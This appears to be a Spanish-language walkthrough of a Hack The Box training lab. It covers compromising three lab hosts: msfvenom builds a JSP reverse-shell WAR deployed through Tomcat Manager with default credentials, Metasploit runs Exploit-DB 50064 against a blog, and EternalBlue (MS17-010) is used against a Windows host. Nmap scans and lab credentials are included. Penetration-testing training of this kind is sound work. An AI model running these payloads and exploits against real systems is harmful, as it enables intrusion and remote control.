🏴‍☠️ HTB Lab Shells & Payloads

🔐 Escenario General

El equipo de CAT5 ha conseguido un punto de apoyo en la red de Inlanefreight.
Nuestra misión:

  1. Revisar el reconocimiento y validar información 🕵️‍♂️

  2. Investigar lo que se puede ver 🔍

  3. Elegir exploits, payloads y shells para controlar los objetivos 💥

  4. Conectarse por VPN o Pwnbox y usar RDP desde el foothold 🖥

Credenciales de foothold:

Conexión RDP:

xfreerdp /v:10.129.41.59 /u:htb-student /p:HTB_@cademy_stdnt!

🖥 Host-01 — shells-winsvr

OS: Windows Server 2019 Standard
Puertos clave: 80 (IIS), 8080 (Apache Tomcat 10.0.11) 🌐
Credenciales Tomcat: tomcat | Tomcatadm

sudo nmap -p- --min-rate 5000 --open -sS -n -sVC  172.16.1.11

OS Detectado: Windows Server 2019 Standard
Nombre del equipo: shells-winsvr

Puertos y Servicios

Puerto Estado Servicio / Protocolo Versión / Detalles
80/tcp open http Microsoft IIS 10.0 – "Inlanefreight", método TRACE habilitado
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft NetBIOS Session Service
445/tcp open microsoft-ds SMB – Windows Server 2019
515/tcp open printer Microsoft LPD (Line Printer Daemon)
1801/tcp open msmq? Microsoft Message Queuing (posible)
2103/tcp open msrpc Microsoft Windows RPC
3387/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
3389/tcp open ms-wbt-server RDP – Microsoft Terminal Services
5504/tcp open msrpc Microsoft Windows RPC
8080/tcp open http Apache Tomcat 10.0.11 – Consola web
49664/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49673/tcp open msrpc Microsoft Windows RPC
49677/tcp open msrpc Microsoft Windows RPC
En esta vez tenemos que centrarnos en el puerto 8080 que hay un apache Tomcat 10.0.11 que parece que no hay ningun exploit y metasploit

🔍 Fingerprinting

⚡ Explotación

Login en Tomcat Manager 🔑

http://172.16.1.11:8080/manager/html
Usuario: tomcat
Contraseña: Tomcatadm

Crear payload WAR 🚀

msfvenom -p java/jsp_shell_reverse_tcp LHOST=172.16.1.5 LPORT=443 -f war > shell.war

Escuchar la conexión 👂

sudo nc -lvnp 443

{559D6693-AB73-4964-95FF-33A442D10942}.png
Subir y ejecutar el payload 📤


🐧 Host-02 — blog.inlanefreight.local

💡 Pista: Sitio tipo blog, posible chat interno. Credenciales conocidas: admin | admin123!@#

sudo nmap -p- --min-rate 5000 --open -sS -n -sVC  blog.inlanefreight.local

🕵️ Fingerprinting

Para ver la version

whatweb http://blog.inlanefreight.local/

La página es como una red social y en un post se menciona una vulnerabilidad: Exploit-DB 50064

⚡ Explotación

  1. Entramos al blog con admin | admin123!@#

  2. Usamos el exploit identificado:

searchsploit -m 50064
msfconsole
reload_all
use exploit/50064.rb
set RHOSTS 172.16.1.12
set USERNAME admin
set PASSWORD admin123!@#
set VHOST blog.inlanefreight.local

Resultado: Shell remota obtenida 💻🎯
{7674137C-0F8D-41D7-8E21-1EEE9C8A4CAA}.png

🪟 Host-03 — SHELLS-WINBLUE

💡 Pista: Este host podría ser vulnerable a EternalBlue (MS17-010). Los puertos abiertos y el sistema detectado lo confirman.

🔍 Escaneo

sudo nmap -p- --min-rate 5000 --open -sS -n -sVC  172.16.1.13

📌 El puerto 445 y el sistema Windows sugieren posible vulnerabilidad MS17-010 (EternalBlue)

⚡ Explotación

En Metasploit:

use exploit/windows/smb/ms17_010_psexec
set RHOSTS 172.16.1.13
set LHOST 172.16.1.5
run

🖥️ Resultado: Acceso remoto obtenido 🎯
{EA0A2718-2B9F-4434-B7F1-5DCA2E06CE24}.png